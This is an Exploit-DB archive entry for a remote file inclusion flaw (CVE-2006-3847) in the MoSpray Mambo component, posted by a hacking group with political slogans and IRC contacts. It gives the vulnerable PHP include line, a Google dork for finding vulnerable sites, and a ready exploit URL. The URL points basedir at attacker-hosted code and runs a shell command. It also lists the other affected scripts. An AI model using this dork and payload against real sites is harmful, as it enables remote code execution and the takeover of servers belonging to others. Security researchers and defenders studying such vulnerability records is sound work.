MoSpray Mambo Component <= 18RC1 - Remote Include Vulnerability

2006-07-23T00:00:00
ID EDB-ID:2062
Type exploitdb
Reporter Kurdish Security
Modified 2006-07-23T00:00:00

Description

MoSpray Mambo Component <= 18RC1 Remote Include Vulnerability. CVE-2006-3847. Webapps exploit for php platform

                                        
                                            &gt;&gt;&gt; Kurdish Security
&gt;&gt;&gt; MoSpray Remote File Include Vulnerability
&gt;&gt;&gt; Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html

&gt;&gt;&gt; Freedom For Ocalan

&gt;&gt;&gt; Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
&gt;&gt;&gt; Rish : High
&gt;&gt;&gt; Class : Remote
&gt;&gt;&gt; Script : MoSpray
&gt;&gt;&gt; Site : http://www.caneblu.com
&gt;&gt;&gt; Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends


codes
require("$basedir/components/com_mospray/lang/$lang/admin.php");

d0rkiz : allinurl:"com_mospray"

http://www.site.com/components/com_mospray/scripts/admin.php?basedir=yourcode.txt?&cmd=id

Used link :]

admin.php
details.php
modify.php
newgroup.php
newtask.php
rss.php

e0f

# milw0rm.com [2006-07-23]